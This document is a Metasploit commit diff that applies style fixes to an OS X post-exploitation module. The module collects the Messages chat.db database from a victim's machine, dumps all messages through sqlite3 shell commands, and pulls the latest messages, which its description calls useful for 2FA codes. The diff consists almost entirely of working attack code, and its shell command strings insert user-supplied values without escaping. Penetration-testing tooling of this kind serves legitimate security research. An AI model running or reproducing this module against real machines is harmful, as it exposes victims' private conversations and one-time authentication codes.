Land rapid7#7624, Wvu's style fixes

David Maloney · David Maloney · commit 3c9ebb97be87 · 2016-11-29T14:05:05.000-06:00
land's wvu's style and text fixes for the
OS X archived messages module
diff --git a/modules/post/osx/gather/enum_messages.rb b/modules/post/osx/gather/enum_messages.rb
@@ -12,33 +12,65 @@ def initialize(info={})
     super(update_info(info,
       'Name'          => 'OS X Gather Messages',
       'Description'   => %q{
-          This module will collect the Messages sqlite3 database files and chat logs
-          from the victim's machine. There are four actions you may choose: DBFILE,
-          READABLE, LATEST and ALL. DBFILE and READABLE will retrieve all messages and
-          LATEST will retrieve the last X number of message (useful with 2FA). Module
-          was tested with OSX 10.11 (El Capitan).
+        This module will collect the Messages sqlite3 database files and chat logs
+        from the victim's machine. There are four actions you may choose: DBFILE,
+        READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and
+        LATEST will retrieve the last X number of messages (useful with 2FA). Module
+        was tested with OS X 10.11 (El Capitan).
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'Geckom <geckom[at]redteamr.com>'],
-      'Platform'      => [ 'osx' ],
-      'SessionTypes'  => [ "meterpreter", "shell" ],
+      'Author'        => ['Geckom <geckom[at]redteamr.com>'],
+      'Platform'      => ['osx'],
+      'SessionTypes'  => ['meterpreter', 'shell'],
       'Actions'       =>
         [
-          ['DBFILE', { 'Description' => 'Collect messages DB file' } ],
-          ['READABLE', { 'Description' => 'Collect messages DB and download in a readable format' } ],
-          ['LATEST', { 'Description' => 'Collect the latest message' } ],
-          ['ALL', { 'Description' => 'Collect all messages data'}]
+          ['DBFILE',   'Description' => 'Collect Messages DB file'],
+          ['READABLE', 'Description' => 'Collect Messages DB and download in a readable format'],
+          ['LATEST',   'Description' => 'Collect the latest message'],
+          ['ALL',      'Description' => 'Collect all Messages data']
         ],
       'DefaultAction' => 'ALL'
     ))
 
     register_options(
       [
         OptInt.new('MSGCOUNT', [false, 'Number of latest messages to retrieve.', 3]),
-        OptString.new('USER', [false, 'Username to retrieve messages from (defaults to current user)', 'CURRENT'])
-      ], self.class)
+        OptString.new('USER',  [false, 'Username to retrieve messages from (defaults to current user)'])
+      ]
+    )
   end
 
+  def run
+    if datastore['USER']
+      user = datastore['USER']
+    else
+      user = cmd_exec('/usr/bin/whoami')
+    end
+
+    # Check file exists
+    messages_path = "/Users/#{user}/Library/Messages/chat.db"
+    if file_exist?(messages_path)
+      print_good("#{peer} - Messages DB found: #{messages_path}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")
+    end
+
+    # Check messages.  And then set the default profile path
+    unless messages_path
+      fail_with(Failure::Unknown, "#{peer} - Unable to find messages, will not continue")
+    end
+
+    print_good("#{peer} - Found Messages file: #{messages_path}")
+
+    files = []
+
+    # Download file
+    files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i
+    files << readable(messages_path) if action.name =~ /ALL|READABLE/i
+    files << latest(messages_path) if action.name =~ /ALL|LATEST/i
+
+    save(files)
+  end
 
   #
   # Collect messages db file.
@@ -49,7 +81,6 @@ def get_db(messages_path)
     {filename: 'messages.db', mime: 'bin', data: message_data}
   end
 
-
   #
   # Generate a readable version of the messages DB
   #
@@ -68,7 +99,7 @@ def readable(messages_path)
       'ORDER BY m.date;'
     ]
     sql = sql.join(' ')
-    readable_data = exec_shell_cmd("sqlite3 #{messages_path} '#{sql}'")
+    readable_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")
     {filename: 'messages.txt', mime: 'text/plain', data: readable_data}
   end
 
@@ -90,7 +121,7 @@ def latest(messages_path)
       "ORDER BY m.date DESC LIMIT #{datastore['MSGCOUNT']};"
     ]
     sql = sql.join(' ')
-    latest_data = exec_shell_cmd("sqlite3 #{messages_path} '#{sql}'")
+    latest_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")
     print_good("#{peer} - Latest messages: \n#{latest_data}")
     {filename: 'latest.txt', mime: 'text/plain', data: latest_data}
   end
@@ -112,80 +143,4 @@ def save(data)
     end
   end
 
-  #
-  # Return an array or directory names
-  #
-  def dir(path)
-    results = []
-    subdirs = exec_shell_cmd("ls -l #{path}")
-
-    unless subdirs =~ /No such file or directory/
-      results = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d\:]+\x20(.+)$/).flatten
-    end
-
-    results
-  end
-
-  #
-  # This is just a wrapper for cmd_exec(), except it chomp() the output,
-  # and retry under certain conditions.
-  #
-  def exec_shell_cmd(cmd)
-    begin
-      out = cmd_exec(cmd).chomp
-    rescue ::Timeout::Error => e
-      vprint_error("#{peer} - #{e.message} - retrying...")
-      retry
-    rescue EOFError => e
-      vprint_error("#{peer} - #{e.message} - retrying...")
-      retry
-    end
-  end
-
-  #
-  def locate_messages(base)
-    dir(base).each do |folder|
-      m = folder.match(/(Messages)$/)
-      if m
-        m = m[0].gsub(/\x20/, "\\\\ ") + "/"
-        return "#{base}#{m}"
-      end
-    end
-
-    nil
-  end
-
-  def run
-    if datastore['USER'] == 'CURRENT'
-      user = exec_shell_cmd("/usr/bin/whoami")
-    else
-      user = datastore['USER']
-    end
-
-    # Check file exists
-    messages_path = "/Users/#{user}/Library/Messages/chat.db"
-    if file_exist?(messages_path)
-      print_good("#{peer} - Messages DB found: #{messages_path}")
-    else
-      fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")
-    end
-
-    # Check messages.  And then set the default profile path
-    unless messages_path
-      fail_with(Failure::Unknown, "#{peer} - Unable to find messages, will not continue")
-    end
-
-    print_good("#{peer} - Found messages file: #{messages_path}")
-
-    files = []
-
-    # Download file
-    files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i
-    files << readable(messages_path) if action.name =~ /ALL|READABLE/i
-    files << latest(messages_path) if action.name =~ /ALL|LATEST/i
-
-    save(files)
-
-  end
-
 end
